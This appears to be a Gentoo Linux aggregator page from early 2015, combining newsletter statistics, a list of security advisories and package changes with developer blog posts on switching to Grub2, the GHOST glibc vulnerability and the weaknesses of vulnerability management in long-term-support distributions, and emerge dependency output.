ia64 3099 694 3793 21.10%
m68k 600 125 725 4.03%
mips 1 2428 2429 13.51%
ppc 6740 2543 9283 51.64%
ppc64 4308 1064 5372 29.88%
s390 1391 424 1815 10.10%
sh 1504 558 2062 11.47%
sparc 4037 982 5019 27.92%
sparc-fbsd 0 315 315 1.75%
x86 11511 5589 17100 95.12%
x86-fbsd 0 3202 3202 17.81%



No GLSAs have been released on January 2015. However, since there was no GMN December 2014, we include the ones for the previous month as well.

The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201412-53 app-crypt/mit-krb5 MIT Kerberos 5: User-assisted execution of arbitrary code 516334
201412-52 net-analyzer/wireshark Wireshark: Multiple vulnerabilities 522968
201412-51 net-misc/asterisk Asterisk: Multiple vulnerabilities 530056
201412-50 net-mail/getmail getmail: Information disclosure 524684
201412-49 app-shells/fish fish: Multiple vulnerabilities 509044
201412-48 sys-apps/file file: Denial of Service 532686
201412-47 sys-cluster/torque TORQUE Resource Manager: Multiple vulnerabilities 372959
201412-46 media-libs/lcms LittleCMS: Denial of Service 479874
201412-45 dev-ruby/facter Facter: Privilege escalation 514476
201412-44 sys-apps/policycoreutils policycoreutils: Privilege escalation 509896
201412-43 app-text/mupdf MuPDF: User-assisted execution of arbitrary code 358029
201412-42 app-emulation/xen Xen: Denial of Service 523524
201412-41 net-misc/openvpn OpenVPN: Denial of Service 531308
201412-40 media-libs/flac FLAC: User-assisted execution of arbitrary code 530288
201412-39 dev-libs/openssl OpenSSL: Multiple vulnerabilities 494816
201412-38 net-misc/icecast Icecast: Multiple Vulnerabilities 529956
201412-37 app-emulation/qemu QEMU: Multiple Vulnerabilities 528922
201412-36 app-emulation/libvirt libvirt: Denial of Service 532204
201412-35 app-admin/rsyslog RSYSLOG: Denial of Service 395709
201412-34 net-misc/ntp NTP: Multiple vulnerabilities 533076
201412-33 net-dns/pdns-recursor PowerDNS Recursor: Multiple vulnerabilities 299942
201412-32 mail-mta/sendmail sendmail: Information disclosure 511760
201412-31 net-irc/znc ZNC: Denial of Service 471738
201412-30 www-servers/varnish Varnish: Multiple vulnerabilities 458888
201412-29 www-servers/tomcat Apache Tomcat: Multiple vulnerabilities 442014
201412-28 dev-ruby/rails Ruby on Rails: Multiple vulnerabilities 354249
201412-27 dev-lang/ruby Ruby: Denial of Service 355439
201412-26 net-misc/strongswan strongSwan: Multiple Vulnerabilities 507722
201412-25 dev-qt/qtgui QtGui: Denial of Service 508984
201412-24 media-libs/openjpeg OpenJPEG: Multiple vulnerabilities 484802
201412-23 net-analyzer/nagios-core Nagios: Multiple vulnerabilities 447802
201412-22 dev-python/django Django: Multiple vulnerabilities 521324
201412-21 www-apache/mod_wsgi mod_wsgi: Privilege escalation 510938
201412-20 gnustep-base/gnustep-base GNUstep Base library: Denial of Service 508370
201412-19 net-dialup/ppp PPP: Information disclosure 519650
201412-18 net-misc/freerdp FreeRDP: User-assisted execution of arbitrary code 511688
201412-17 app-text/ghostscript-gpl GPL Ghostscript: Multiple vulnerabilities 264594
201412-16 dev-db/couchdb CouchDB: Denial of Service 506354
201412-15 app-admin/mcollective MCollective: Privilege escalation 513292
201412-14 media-gfx/xfig Xfig: User-assisted execution of arbitrary code 297379
201412-13 www-client/chromium Chromium: Multiple vulnerabilities 524764
201412-12 sys-apps/dbus D-Bus: Multiple Vulnerabilities 512940
201412-11 app-emulation/emul-linux-x86-baselibs AMD64 x86 emulation base libraries: Multiple vulnerabilities 196865
201412-10 www-apps/egroupware (and 6 more) Multiple packages, Multiple vulnerabilities fixed in 2012 284536
201412-09 games-sports/racer-bin (and 24 more) Multiple packages, Multiple vulnerabilities fixed in 2011 194151
201412-08 dev-util/insight (and 26 more) Multiple packages, Multiple vulnerabilities fixed in 2010 159556
201412-07 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 530692
201412-06 dev-libs/libxml2 libxml2: Denial of Service 525656
201412-05 app-antivirus/clamav Clam AntiVirus: Denial of service 529728
201412-04 app-emulation/libvirt libvirt: Multiple vulnerabilities 483048
201412-03 net-mail/dovecot Dovecot: Denial of Service 509954
201412-02 net-fs/nfs-utils nfs-utils: Information disclosure 464636
201412-01 app-emulation/qemu QEMU: Multiple Vulnerabilities 514680

Package Removals/Additions


Package Developer Date
app-admin/rudy mrueg 01 Jan 2015
dev-ruby/attic mrueg 01 Jan 2015
dev-ruby/caesars mrueg 01 Jan 2015
dev-ruby/hexoid mrueg 01 Jan 2015
dev-ruby/gibbler mrueg 01 Jan 2015
dev-ruby/rye mrueg 01 Jan 2015
dev-ruby/storable mrueg 01 Jan 2015
dev-ruby/tryouts mrueg 01 Jan 2015
dev-ruby/sysinfo mrueg 01 Jan 2015
dev-perl/MooseX-AttributeHelpers zlogene 01 Jan 2015
dev-db/pgasync titanofold 07 Jan 2015
app-misc/cdcollect pacho 07 Jan 2015
net-im/linpopup pacho 07 Jan 2015
media-gfx/f-spot pacho 07 Jan 2015
media-gfx/truevision pacho 07 Jan 2015
dev-ruby/tmail mrueg 21 Jan 2015
dev-ruby/refe mrueg 21 Jan 2015
dev-ruby/mysql-ruby mrueg 21 Jan 2015
dev-ruby/gem_plugin mrueg 21 Jan 2015
dev-ruby/directory_watcher mrueg 21 Jan 2015
dev-ruby/awesome_nested_set mrueg 21 Jan 2015
app-emacs/cedet ulm 28 Jan 2015
app-vim/svncommand radhermit 30 Jan 2015
app-vim/cvscommand radhermit 30 Jan 2015


Package Developer Date
dev-ruby/rails-html-sanitizer graaff 01 Jan 2015
dev-ruby/rails-dom-testing graaff 01 Jan 2015
dev-ruby/rails-deprecated_sanitizer graaff 01 Jan 2015
dev-ruby/activejob graaff 01 Jan 2015
app-crypt/gkeys-gen dolsen 01 Jan 2015
dev-haskell/bencode gienah 03 Jan 2015
dev-haskell/torrent gienah 03 Jan 2015
dev-python/PyPDF2 idella4 03 Jan 2015
dev-python/tzlocal floppym 03 Jan 2015
dev-python/APScheduler floppym 03 Jan 2015
app-emacs/dts-mode ulm 03 Jan 2015
dev-python/configargparse radhermit 04 Jan 2015
dev-haskell/setlocale slyfox 04 Jan 2015
dev-haskell/hgettext slyfox 04 Jan 2015
dev-python/parsley mrueg 05 Jan 2015
dev-python/vcversioner mrueg 06 Jan 2015
dev-python/txsocksx mrueg 06 Jan 2015
media-plugins/vdr-rpihddevice hd_brummy 06 Jan 2015
net-misc/chrome-remote-desktop vapier 06 Jan 2015
app-admin/systemrescuecd-x86 mgorny 06 Jan 2015
dev-python/pgasync titanofold 07 Jan 2015
net-proxy/shadowsocks-libev dlan 08 Jan 2015
net-misc/i2pd blueness 08 Jan 2015
games-misc/exult-sound mr_bones_ 09 Jan 2015
kde-frameworks/kpackage mrueg 09 Jan 2015
kde-frameworks/networkmanager-qt mrueg 09 Jan 2015
games-puzzle/ksokoban bircoph 10 Jan 2015
dev-cpp/lucene++ johu 10 Jan 2015
app-emacs/multi-term ulm 10 Jan 2015
dev-java/xml-security ercpe 11 Jan 2015
dev-libs/libtreadstone patrick 13 Jan 2015
dev-libs/utfcpp yac 13 Jan 2015
net-print/epson-inkjet-printer-escpr floppym 15 Jan 2015
dev-cpp/websocketpp johu 16 Jan 2015
sys-apps/systemd-readahead pacho 17 Jan 2015
dev-util/radare2 slyfox 18 Jan 2015
dev-python/wcsaxes xarthisius 18 Jan 2015
net-analyzer/apinger jer 19 Jan 2015
dev-lang/go-bootstrap williamh 20 Jan 2015
media-plugins/vdr-satip hd_brummy 20 Jan 2015
dev-perl/Data-Types chainsaw 20 Jan 2015
dev-perl/DateTime-Tiny chainsaw 20 Jan 2015
dev-perl/MongoDB chainsaw 20 Jan 2015
dev-python/paramunittest alunduil 21 Jan 2015
dev-python/mando alunduil 21 Jan 2015
dev-python/radon alunduil 21 Jan 2015
sci-geosciences/opencpn-plugin-br24radar mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-climatology mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-launcher mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-logbookkonni mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-objsearch mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-ocpndebugger mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-statusbar mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-weatherfax mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-weather_routing mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-wmm mschiff 21 Jan 2015
dev-python/elasticsearch-py vapier 22 Jan 2015
dev-php/ming-php grknight 22 Jan 2015
app-portage/cpuinfo2cpuflags mgorny 23 Jan 2015
dev-ruby/spy mrueg 24 Jan 2015
dev-ruby/power_assert graaff 25 Jan 2015
dev-ruby/vcr graaff 25 Jan 2015
dev-util/trace-cmd chutzpah 27 Jan 2015
net-libs/iojs patrick 27 Jan 2015
dev-python/bleach radhermit 27 Jan 2015
dev-python/readme radhermit 27 Jan 2015
www-client/vivaldi jer 27 Jan 2015
media-libs/libpagemaker jlec 27 Jan 2015
dev-python/jenkinsapi idella4 28 Jan 2015
dev-python/httmock idella4 28 Jan 2015
dev-python/jenkins-webapi idella4 29 Jan 2015
sec-policy/selinux-git perfinion 29 Jan 2015
x11-drivers/xf86-video-opentegra chithanh 29 Jan 2015
dev-java/cssparser monsieurp 30 Jan 2015
app-emulation/docker-compose alunduil 31 Jan 2015
dev-python/oslo-context prometheanfire 31 Jan 2015
dev-python/oslo-middleware prometheanfire 31 Jan 2015
dev-haskell/tasty-kat qnikst 31 Jan 2015
dev-perl/Monitoring-Plugin mjo 31 Jan 2015


The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.


The following tables and charts summarize the activity on Bugzilla between 01 January 2015 and 31 January 2015. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.

Bug Activity Number
New 2113
Closed 1058
Not fixed 182
Duplicates 150
Total 6525
Blocker 3
Critical 16
Major 62

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Perl team 66
2 Gentoo Linux Gnome Desktop Team 66
3 Python Gentoo Team 44
4 Gentoo Games 42
5 Gentoo KDE team 34
6 Default Assignee for Orphaned Packages 27
7 Gentoo's Haskell Language team 26
8 Gentoo Security 22
9 Gentoo Ruby Team 22
10 Others 708


Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Security 106
2 Gentoo Linux bug wranglers 103
3 Gentoo Perl team 72
4 Gentoo Games 72
5 Python Gentoo Team 66
6 Gentoo Linux Gnome Desktop Team 66
7 Gentoo's Haskell Language team 65
8 Default Assignee for Orphaned Packages 54
9 Java team 53
10 Others 1455


Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to

Comments or Suggestions?

Please head over to this forum post.

February 02, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Mozilla: Hating you so you don't have to (February 02, 2015, 02:33 UTC)

Ahem. I'm mildly amused, Firefox 35 shows me this nice little informational message in the "Get addons" view:

Secure Connection Failed

An error occurred during a connection to 
Peer's Certificate has been revoked. (Error code: sec_error_revoked_certificate) 
Oh well. Why I was looking at that anyway? Well, for some reasons I've had adb (android thingy) running on my desktop. Which makes little sense ... but ... find tells me:
So now there's a random service running *when I start firefox* because ...

err, I might want to " test, deploy and debug HTML5 web apps on Firefox OS phones & Simulator, directly from Firefox browser. "
Which I don't. But I appreciate having extra crap default-enabled for no reason. Sigh.

Mozilla: We hate you so you don't have to

January 31, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Choice included (January 31, 2015, 17:35 UTC)

Some time ago, Matteo Pescarin created the great "Gentoo Abducted" design. Here are, after some minor doodling for the fun of it, several A0 posters based on that design, pointing out the excellent features of Gentoo. Released under CC BY-SA 2.5 as the original. Enjoy!






Sebastian Pipping a.k.a. sping (homepage, bugs)
Switching to Grub2 on Gentoo (January 31, 2015, 17:26 UTC)


There seem to be quite a number of people being “afraid” of Grub2, because of the “no single file” approach. From more people, I hear about sticking to Grub legacy or moving to syslinux, rather than upgrading to Grub2.

I used to be one of those not too long ago: I’ve been sticking to Grub legacy for quite a while, mainly because I never felt like breaking a booting system at that very moment. I have finally upgraded my Gentoo dev machine to Grub2 now and I’m rather happy with the results:

  • No manual editing of Grug2 config files for kernel upgrades any more
  • The Grub2 rescue shell, if I should break things
  • Fancy theming if I feel like that next week
  • I am off more or less unmaintained software

My steps to upgrade were:

1. Install sys-boot/grub:2.

2. Inspect the output of “sudo grub2-mkconfig” (which goes to stdout) to get a feeling for it.

3. Tune /etc/default/grub a bit:


# This is genkernel
GRUB_CMDLINE_LINUX="dolvm dokeymap keymap=de
    real_root=/dev/gentoo/root noslowusb"

# A bit retro, works with and without external display


NOTE: I broke the GRUB_CMDLINE_LINUX line for readability, only.

4. Insert a “shutdown” menu entry at /etc/grub.d/40_custom:

exec tail -n +3 $0
# This file provides an easy way to add custom menu entries.  Simply type the
# menu entries you want to add after this comment.  Be careful not to change
# the 'exec tail' line above.

menuentry "Shutdown" {

5. Run “sudo grub2-mkconfig -o /boot/grub/grub.cfg“.

6. Run “sudo grub2-install /dev/disk/by-id/ata-HITACHI_000000000000000_00000000000000000000“.

Using /dev/disk/ greatly reduces the risk of installing to the wrong disk.
Check “find /dev/disk | xargs ls -ld“.

7. Reboot


For kernel updates, my new process is

emerge -auv sys-kernel/vanilla-sources

pushd /usr/src
cp linux-3.18.3/.config linux-3.18.4/

# yes, sys-kernel/vanilla-sources[symlink] would do that for me
rm linux
ln -s linux-3.18.4 linux

pushd linux
yes '' | make oldconfig

make -j4 && make modules_install install \
		&& emerge tp_smapi \
		&& genkernel initramfs \
		&& grub2-mkconfig -o /boot/grub/grub.cfg


Best, Sebastian

January 29, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

GHOSTOn Tuesday details about the security vulnerability GHOST in Glibc were published by the company Qualys. When severe security vulnerabilities hit the news I always like to take this as a chance to learn what can be improved and how to avoid similar incidents in the future (see e. g. my posts on Heartbleed/Shellshock, POODLE/BERserk and NTP lately).

GHOST itself is a Heap Overflow in the name resolution function of the Glibc. The Glibc is the standard C library on Linux systems, almost every software that runs on a Linux system uses it. It is somewhat unclear right now how serious GHOST really is. A lot of software uses the affected function gethostbyname(), but a lot of conditions have to be met to make this vulnerability exploitable. Right now the most relevant attack is against the mail server exim where Qualys has developed a working exploit which they plan to release soon. There have been speculations whether GHOST might be exploitable through Wordpress, which would make it much more serious.

Technically GHOST is a heap overflow, which is a very common bug in C programming. C is inherently prone to these kinds of memory corruption errors and there are essentially two things here to move forwards: Improve the use of exploit mitigation techniques like ASLR and create new ones (levee is an interesting project, watch this 31C3 talk). And if possible move away from C altogether and develop core components in memory safe languages (I have high hopes for the Mozilla Servo project, watch this talk).

GHOST was discovered three times

But the thing I want to elaborate here is something different about GHOST: It turns out that it has been discovered independently three times. It was already fixed in 2013 in the Glibc Code itself. The commit message didn't indicate that it was a security vulnerability. Then in early 2014 developers at Google found it again using Address Sanitizer (which – by the way – tells you that all software developers should use Address Sanitizer more often to test their software). Google fixed it in Chrome OS and explicitly called it an overflow and a vulnerability. And then recently Qualys found it again and made it public.

Now you may wonder why a vulnerability fixed in 2013 made headlines in 2015. The reason is that it widely wasn't fixed because it wasn't publicly known that it was serious. I don't think there was any malicious intent. The original Glibc fix was probably done without anyone noticing that it is serious and the Google devs may have thought that the fix is already public, so they don't need to make any noise about it. But we can clearly see that something doesn't work here. Which brings us to a discussion how the Linux and free software world in general and vulnerability management in particular work.

The “Never touch a running system” principle

Quite early when I came in contact with computers I heard the phrase “Never touch a running system”. This may have been a reasonable approach to IT systems back then when computers usually weren't connected to any networks and when remote exploits weren't a thing, but it certainly isn't a good idea today in a world where almost every computer is part of the Internet. Because once new security vulnerabilities become public you should change your system and fix them. However that doesn't change the fact that many people still operate like that.

A number of Linux distributions provide “stable” or “Long Time Support” versions. Basically the idea is this: At some point they take the current state of their systems and further updates will only contain important fixes and security updates. They guarantee to fix security vulnerabilities for a certain time frame. This is kind of a compromise between the “Never touch a running system” approach and reasonable security. It tries to give you a system that will basically stay the same, but you get fixes for security issues. Popular examples for this approach are the stable branch of Debian, Ubuntu LTS versions and the Enterprise versions of Red Hat and SUSE.

To give you an idea about time frames, Debian currently supports the stable trees Squeeze (6.0) which was released 2011 and Wheezy (7.0) which was released 2013. Red Hat Enterprise Linux has currently 4 supported version (4, 5, 6, 7), the oldest one was originally released in 2005. So we're talking about pretty long time frames that these systems get supported. Ubuntu and Suse have similar long time supported Systems.

These systems are delivered with an implicit promise: We will take care of security and if you update regularly you'll have a system that doesn't change much, but that will be secure against know threats. Now the interesting question is: How well do these systems deliver on that promise and how hard is that?

Vulnerability management is chaotic and fragile

I'm not sure how many people are aware how vulnerability management works in the free software world. It is a pretty fragile and chaotic process. There is no standard way things work. The information is scattered around many different places. Different people look for vulnerabilities for different reasons. Some are developers of the respective projects themselves, some are companies like Google that make use of free software projects, some are just curious people interested in IT security or researchers. They report a bug through the channels of the respective project. That may be a mailing list, a bug tracker or just a direct mail to the developer. Hopefully the developers fix the issue. It does happen that the person finding the vulnerability first has to explain to the developer why it actually is a vulnerability. Sometimes the fix will happen in a public code repository, sometimes not. Sometimes the developer will mention that it is a vulnerability in the commit message or the release notes of the new version, sometimes not. There are notorious projects that refuse to handle security vulnerabilities in a transparent way. Sometimes whoever found the vulnerability will post more information on his/her blog or on a mailing list like full disclosure or oss-security. Sometimes not. Sometimes vulnerabilities get a CVE id assigned, sometimes not.

Add to that the fact that in many cases it's far from clear what is a security vulnerability. It is absolutely common that if you ask the people involved whether this is serious the best and most honest answer they can give is “we don't know”. And very often bugs get fixed without anyone noticing that it even could be a security vulnerability.

Then there are projects where the number of security vulnerabilities found and fixed is really huge. The latest Chrome 40 release had 62 security fixes, version 39 had 42. Chrome releases a new version every two months. Browser vulnerabilities are found and fixed on a daily basis. Not that extreme but still high is the vulnerability count in PHP, which is especially worrying if you know that many webhosting providers run PHP versions not supported any more.

So you probably see my point: There is a very chaotic stream of information in various different places about bugs and vulnerabilities in free software projects. The number of vulnerabilities is huge. Making a promise that you will scan all this information for security vulnerabilities and backport the patches to your operating system is a big promise. And I doubt anyone can fulfill that.

GHOST is a single example, so you might ask how often these things happen. At some point right after GHOST became public this excerpt from the Debian Glibc changelog caught my attention (excuse the bad quality, had to take the image from Twitter because I was unable to find that changelog on Debian's webpages):

eglibc Changelog

What you can see here: While Debian fixed GHOST (which is CVE-2015-0235) they also fixed CVE-2012-6656 – a security issue from 2012. Admittedly this is a minor issue, but it's a vulnerability nevertheless. A quick look at the Debian changelog of Chromium both in squeeze and wheezy will tell you that they aren't fixing all the recent security issues in it. (Debian already had discussions about removing Chromium and in Wheezy they don't stick to a single version.)

It would be an interesting (and time consuming) project to take a package like PHP and check for all the security vulnerabilities whether they are fixed in the latest packages in Debian Squeeze/Wheezy, all Red Hat Enterprise versions and other long term support systems. PHP is probably more interesting than browsers, because the high profile targets for these vulnerabilities are servers. What worries me: I'm pretty sure some people already do that. They just won't tell you and me, instead they'll write their exploits and sell them to repressive governments or botnet operators.

Then there are also stories like this: Tavis Ormandy reported a security issue in Glibc in 2012 and the people from Google's Project Zero went to great lengths to show that it is actually exploitable. Reading the Glibc bug report you can learn that this was already reported in 2005(!), just nobody noticed back then that it was a security issue and it was minor enough that nobody cared to fix it.

There are also bugs that require changes so big that backporting them is essentially impossible. In the TLS world a lot of protocol bugs have been highlighted in recent years. Take Lucky Thirteen for example. It is a timing sidechannel in the way the TLS protocol combines the CBC encryption, padding and authentication. I like to mention this bug because I like to quote it as the TLS bug that was already mentioned in the specification (RFC 5246, page 23: "This leaves a small timing channel"). The real fix for Lucky Thirteen is not to use the erratic CBC mode any more and switch to authenticated encryption modes which are part of TLS 1.2. (There's another possible fix which is using Encrypt-then-MAC, but it is hardly deployed.) Up until recently most encryption libraries didn't support TLS 1.2. Debian Squeeze and Red Hat Enterprise 5 ship OpenSSL versions that only support TLS 1.0. There is no trivial patch that could be backported, because this is a huge change. What they likely backported are workarounds that avoid the timing channel. This will stop the attack, but it is not a very good fix, because it keeps the problematic old protocol and will force others to stay compatible with it.

LTS and stable distributions are there for a reason

The big question is of course what to do about it. OpenBSD developer Ted Unangst wrote a blog post yesterday titled Long term support considered harmful, I suggest you read it. He argues that we should get rid of long term support completely and urge users to upgrade more often. OpenBSD has a 6 month release cycle and supports two releases, so one version gets supported for one year.

Given what I wrote before you may think that I agree with him, but I don't. While I personally always avoided to use too old systems – I 'm usually using Gentoo which doesn't have any snapshot releases at all and does rolling releases – I can see the value in long term support releases. There are a lot of systems out there – connected to the Internet – that are never updated. Taking away the option to install systems and let them run with relatively little maintenance overhead over several years will probably result in more systems never receiving any security updates. With all its imperfectness running a Debian Squeeze with the latest updates is certainly better than running an operating system from 2011 that stopped getting security fixes in 2012.

Improving the information flow

I don't think there is a silver bullet solution, but I think there are things we can do to improve the situation. What could be done is to coordinate and share the work. Debian, Red Hat and other distributions with stable/LTS versions could agree that their next versions are based on a specific Glibc version and they collaboratively work on providing patch sets to fix all the vulnerabilities in it. This already somehow happens with upstream projects providing long term support versions, the Linux kernel does that for example. Doing that at scale would require vast organizational changes in the Linux distributions. They would have to agree on a roughly common timescale to start their stable versions.

What I'd consider the most crucial thing is to improve and streamline the information flow about vulnerabilities. When Google fixes a vulnerability in Chrome OS they should make sure this information is shared with other Linux distributions and the public. And they should know where and how they should share this information.

One mechanism that tries to organize the vulnerability process is the system of CVE ids. The idea is actually simple: Publicly known vulnerabilities get a fixed id and they are in a public database. GHOST is CVE-2015-0235 (the scheme will soon change because four digits aren't enough for all the vulnerabilities we find every year). I got my first CVEs assigned in 2007, so I have some experiences with the CVE system and they are rather mixed. Sometimes I briefly mention rather minor issues in a mailing list thread and a CVE gets assigned right away. Sometimes I explicitly ask for CVE assignments and never get an answer.

I would like to see that we just assign CVEs for everything that even remotely looks like a security vulnerability. However right now I think the process is to unreliable to deliver that. There are other public vulnerability databases like OSVDB, I have limited experience with them, so I can't judge if they'd be better suited. Unfortunately sometimes people hesitate to request CVE ids because others abuse the CVE system to count assigned CVEs and use this as a metric how secure a product is. Such bad statistics are outright dangerous, because it gives people an incentive to downplay vulnerabilities or withhold information about them.

This post was partly inspired by some discussions on oss-security

January 28, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
CGit (January 28, 2015, 05:26 UTC)

Dirty hack of the day:

A CGit Mirror of

I wonder if the update cronjob actually works ...

January 23, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
A story of Dependencies (January 23, 2015, 03:41 UTC)

Yesterday I wanted to update a build chroot I have. And ... strangely ... there was a pile of new dependencies:

# emerge -upNDv world

These are the packages that would be merged, in order:

Calculating dependencies... done!
[ebuild     U  ] sys-devel/patch-2.7.2 [2.7.1-r3] USE="-static {-test} -xattr" 0 KiB
[ebuild     U  ] sys-devel/automake-wrapper-10 [9] 0 KiB
[ebuild  N     ] dev-libs/lzo-2.08-r1:2  USE="-examples -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-fonts/dejavu-2.34  USE="-X -fontforge" 0 KiB
[ebuild  N     ] dev-libs/gobject-introspection-common-1.42.0  0 KiB
[ebuild  N     ] media-libs/libpng-1.6.16:0/16  USE="-apng (-neon) -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-libs/vala-common-0.26.1  0 KiB
[ebuild     U  ] dev-libs/libltdl-2.4.5 [2.4.4] USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] virtual/ttf-fonts-1  0 KiB
[ebuild  N     ] x11-themes/hicolor-icon-theme-0.14  0 KiB
[ebuild  N     ] dev-perl/XML-NamespaceSupport-1.110.0-r1  0 KiB
[ebuild  N     ] dev-perl/XML-SAX-Base-1.80.0-r1  0 KiB
[ebuild  N     ] virtual/perl-Storable-2.490.0  0 KiB
[ebuild     U  ] sys-libs/readline-6.3_p8-r2 [6.3_p8-r1] USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild     U  ] app-shells/bash-4.3_p33-r1 [4.3_p33] USE="net nls (readline) -afs -bashlogger -examples -mem-scramble -plugins -vanilla" 0 KiB
[ebuild  N     ] media-libs/freetype-2.5.5:2  USE="adobe-cff bzip2 -X -auto-hinter -bindist -debug -doc -fontforge -harfbuzz -infinality -png -static-libs -utils" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-perl/XML-SAX-0.990.0-r1  0 KiB
[ebuild  N     ] dev-libs/libcroco-0.6.8-r1:0.6  USE="{-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-perl/XML-LibXML-2.1.400-r1  USE="{-test}" 0 KiB
[ebuild  N     ] dev-perl/XML-Simple-2.200.0-r1  0 KiB
[ebuild  N     ] x11-misc/icon-naming-utils-0.8.90  0 KiB
[ebuild  NS    ] sys-devel/automake-1.15:1.15 [1.13.4:1.13, 1.14.1:1.14] 0 KiB
[ebuild     U  ] sys-devel/libtool-2.4.5:2 [2.4.4:2] USE="-vanilla" 0 KiB
[ebuild  N     ] x11-proto/xproto-7.0.26  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/xextproto-7.3.0  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/inputproto-2.3.1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/damageproto-1.2.1-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/xtrans-1.3.5  USE="-doc" 0 KiB
[ebuild  N     ] x11-proto/renderproto-0.11.1-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-fonts/font-util-1.3.0  0 KiB
[ebuild  N     ] x11-misc/util-macros-1.19.0  0 KiB
[ebuild  N     ] x11-proto/compositeproto-0.4.2-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/recordproto-1.14.2-r1  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libICE-1.0.9  USE="ipv6 -doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libSM-1.2.2-r1  USE="ipv6 uuid -doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/fixesproto-5.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/randrproto-1.4.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/kbproto-1.0.6-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/xf86bigfontproto-1.2.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXau-1.0.8  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXdmcp-1.1.1-r1  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-libs/libpthread-stubs-0.3-r1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/pixman-0.32.6  USE="sse2 (-altivec) (-iwmmxt) (-loongson2f) -mmxext (-neon) -ssse3 -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  NS    ] app-text/docbook-xml-dtd-4.4-r2:4.4 [4.1.2-r6:4.1.2, 4.2-r2:4.2, 4.5-r1:4.5] 0 KiB
[ebuild  N     ] app-text/xmlto-0.0.26  USE="-latex" 0 KiB
[ebuild  N     ] sys-apps/dbus-1.8.12  USE="-X -debug -doc (-selinux) -static-libs -systemd {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] net-misc/curl-7.40.0  USE="ipv6 ssl -adns -idn -kerberos -ldap -metalink -rtmp -samba -ssh -static-libs {-test} -threads" ABI_X86="(64) -32 (-x32)" CURL_SSL="openssl -axtls -gnutls -nss -polarssl (-winssl)" 0 KiB
[ebuild  N     ] app-arch/libarchive-3.1.2-r1:0/13  USE="acl bzip2 e2fsprogs iconv lzma zlib -expat -lzo -nettle -static-libs -xattr" 0 KiB
[ebuild  N     ] dev-util/cmake-3.1.0  USE="ncurses -doc -emacs -qt4 (-qt5) {-test}" 0 KiB
[ebuild  N     ] media-gfx/graphite2-1.2.4-r1  USE="-perl {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-libs/fontconfig-2.11.1-r2:1.0  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-admin/eselect-fontconfig-1.1  0 KiB
[ebuild  N     ] dev-libs/gobject-introspection-1.42.0  USE="-cairo -doctool {-test}" PYTHON_TARGETS="python2_7" 0 KiB
[ebuild  N     ] dev-libs/atk-2.14.0  USE="introspection nls {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-util/gdbus-codegen-2.42.1  PYTHON_TARGETS="python2_7 python3_3 -python3_4" 0 KiB
[ebuild  N     ] x11-proto/xcb-proto-1.11  ABI_X86="(64) -32 (-x32)" PYTHON_TARGETS="python2_7 python3_3 -python3_4" 0 KiB
[ebuild  N     ] x11-libs/libxcb-1.11-r1:0/1.11  USE="-doc (-selinux) -static-libs -xkb" ABI_X86="(64) -32 (-x32)" 0 KiB
